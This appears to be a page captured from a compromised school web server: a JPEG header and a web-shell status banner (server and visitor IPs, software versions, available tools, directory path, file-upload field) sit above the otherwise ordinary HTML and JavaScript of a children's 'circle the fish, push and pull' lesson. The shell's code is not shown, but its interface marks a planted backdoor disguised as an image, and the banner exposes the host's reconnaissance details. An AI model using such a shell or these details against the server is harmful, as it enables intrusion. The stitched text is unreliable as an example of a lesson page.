????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.141.164.253 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old10/Html/LevelB/Category1/ |
Upload File : |
<!DOCTYPE html> <html> <head> <title>Circle the 'fish, push and pull'</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <style type="text/css"> svg { position: absolute; background-color: transparent; } </style> <script> function page_preLoad() { s_setDeviceTypeLevelCategoryLastLesson(Level.B, Category.No1); s_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); s_setHeaderTable2('id_tblHeader', s_title_page, s_getSubTitle(Level.B, Category.No1, 10), true, true, true); s_setFooterTable('id_tblFooter', true, true, true, true, true); var ids_texts = ['id_td_text1', 'id_td_text2', 'id_td_text3', 'id_td_text4', 'id_td_text5', 'id_td_text6', 'id_td_text7', 'id_td_text8', 'id_td_text9', 'id_td_text10']; s_adjust_fontSize_for_ids_all_devices(ids_texts, 80); var id_tables_array = ['id_table1', 'id_table2', 'id_table3', 'id_table4']; s_border_collapse_for_tables_except_android(id_tables_array); } function page_onLoad() { setAllSvgsWidthHeightAndPositionFromTds(); setAllEllipseStyles(); s_setTablesHeightsForIE(); } function setAllSvgsWidthHeightAndPositionFromTds() { var nTds = 6; for (var nthTd = 1; nthTd <= nTds; nthTd++) { s_svg_setSvgWidthHeightAndPositionFromTd('id_td' + nthTd, 'id_svg' + nthTd); } } function setAllEllipseStyles() { var allEllipseIdsArray = getAllEllipseIdsArray(); for (var indexEllipse = 0; indexEllipse < allEllipseIdsArray.length; indexEllipse++) { var id_ellipse = allEllipseIdsArray[indexEllipse]; s_svg_setEllipseStyle(id_ellipse); } } function getAllEllipseIdsArray() { var allEllipseIdsArray = new Array(); for (var nthEllipse = 1; nthEllipse <= 8; nthEllipse++) { allEllipseIdsArray.push('id_ellipse' + nthEllipse ); } return (allEllipseIdsArray); } function ellipse_click(id_ellipse) { if (s_isZoomChecked()) { var id_img = id_ellipse.replace('id_ellipse', 'id_img'); s_showImageBiggerWithImage_sizePercent(id_img, '30%'); } else { var group1IdsArray = ['id_ellipse1', 'id_ellipse2']; var group2IdsArray = ['id_ellipse3', 'id_ellipse4']; var group3IdsArray = ['id_ellipse5', 'id_ellipse6']; var group4IdsArray = ['id_ellipse7', 'id_ellipse8']; var allGroupsIdsArrayArray = [group1IdsArray, group2IdsArray, group3IdsArray, group4IdsArray]; s_svg_showHideEllipsesMultipleFor1Td(id_ellipse, allGroupsIdsArrayArray); } } function btnValidate_click() { var allEllipseIdsArray = getAllEllipseIdsArray(); var correctEllipseIdsArray = ['id_ellipse1', 'id_ellipse4', 'id_ellipse5', 'id_ellipse8']; var nCorrectEllipses = s_svg_validateEllipses(allEllipseIdsArray, correctEllipseIdsArray); if (nCorrectEllipses == 4) { s_show_claps_animation('s_id_div_message'); } } function btnPrevious_click() { window.location = 'LevelBCat1Lesson09.html'; } function btnNext_click() { window.location = 'LevelBCat1Lesson11.html'; } function btnHome_click() { s_btnHomeCategories_click('LevelB'); } function page_onResize() { for (var nthTd = 1; nthTd <= 6; nthTd++) { var eTd = document.getElementById('id_td' + nthTd); var eTdRectangle = eTd.getBoundingClientRect(); var eCanvas = document.getElementById('id_svg' + nthTd); eCanvas.style.left = eTdRectangle.left + 'px'; eCanvas.style.top = eTdRectangle.top + 'px'; } } </script> </head> <body onLoad="page_onLoad()" onResize="page_onResize()"> <div id="s_id_div_message"></div> <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0" bgcolor="white"> <tr height="8%"> <td> <div id="id_tblHeader"></div> </td> </tr> <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td> <table width="100%" height="100%" border="0px" cellspacing="0" cellpadding="2%"> <tr height="25%"> <td align="center" style="padding-bottom: 0px"> <table id="id_table1" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_text1" class="s_style_textBlack" style="border-bottom:none; padding-left:2%">Circle the <span id="id_td_text2" class="s_style_textRed">fish</span> which is <span id="id_td_text3" class="s_style_textBlue">in </span>the pot.</td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="33%"> </td> <td id="id_td1" width="*" style="text-align:center"> <img id="id_img1" src="../../../img/LevelB/Category1/LevelBCat1Lesson10/fishInPot.png" width="40%" draggable="false"> <svg id="id_svg1" style="visibility: hidden"> <ellipse id="id_ellipse1" cx="47%" cy="60%" rx="14%" ry="20%"/> <ellipse id="id_ellipse2" cx="59%" cy="28%" rx="10%" ry="15%"/> </svg> </td> <td width="33%"> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="25%"> <td align="center" style="padding-bottom: 0px"> <table id="id_table2" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_text4" class="s_style_textBlack" style="border-bottom:none; padding-left:2%">Circle the <span id="id_td_text5" class="s_style_textRed">fish</span> which is <span id="id_td_text6" class="s_style_textBlue">out </span>of the pot.</td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="33%"> </td> <td id="id_td2" width="*" style="text-align:center"> <img id="id_img3" onclick="s_showImageBiggerDefault()" src="../../../img/LevelB/Category1/LevelBCat1Lesson10/fishInPot.png" width="40%" draggable="false"> <svg id="id_svg2" style="visibility: hidden"> <ellipse id="id_ellipse3" cx="47%" cy="60%" rx="14%" ry="20%"/> <ellipse id="id_ellipse4" cx="59%" cy="28%" rx="10%" ry="15%"/> </svg> </td> <td width="33%"> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="25%"> <td align="center" style="padding-bottom: 0px"> <table id="id_table3" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_text7" class="s_style_textBlack" style="border-bottom:none; padding-left:2%">Circle the action <span id="id_td_text8" class="s_style_textRed">push</span>. </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td3" width="50%" style="text-align:center"> <img id="id_imgActionPush1" src="../../../img/LevelB/Category1/LevelBCat1Lesson10/actionPush.png" width="40%" draggable="false"> <svg id="id_svg3" style="visibility: hidden"> <ellipse id="id_ellipse5" cx="50%" cy="50%" rx="20%" ry="45%"/> </svg> </td> <td id="id_td4" width="*" style="text-align:center"> <img id="id_imgActionPull1" src="../../../img/LevelB/Category1/LevelBCat1Lesson10/actionPull.png" width="40%" draggable="false"> <svg id="id_svg4" style="visibility: hidden"> <ellipse id="id_ellipse6" cx="50%" cy="50%" rx="20%" ry="45%"/> </svg> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="*"> <td align="center"> <table id="id_table4" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="20%"> <td id="id_td_text9" class="s_style_textBlack" style="border-bottom:none; padding-left:2%">Circle the action <span id="id_td_text10" class="s_style_textRed">pull</span>. </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td5" width="50%" style="text-align:center"> <img id="id_imgActionPush2" src="../../../img/LevelB/Category1/LevelBCat1Lesson10/actionPush.png" width="40%" draggable="false"> <svg id="id_svg5" style="visibility: hidden"> <ellipse id="id_ellipse7" cx="50%" cy="50%" rx="20%" ry="45%"/> </svg> </td> <td id="id_td6" width="*" style="text-align:center"> <img id="id_imgActionPull2" src="../../../img/LevelB/Category1/LevelBCat1Lesson10/actionPull.png" width="40%" draggable="false"> <svg id="id_svg6" style="visibility: hidden"> <ellipse id="id_ellipse8" cx="50%" cy="50%" rx="20%" ry="45%"/> </svg> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="8%"> <td> <div id="id_tblFooter"></div> </td> </tr> </table> <script> page_preLoad(); </script> </body> </html>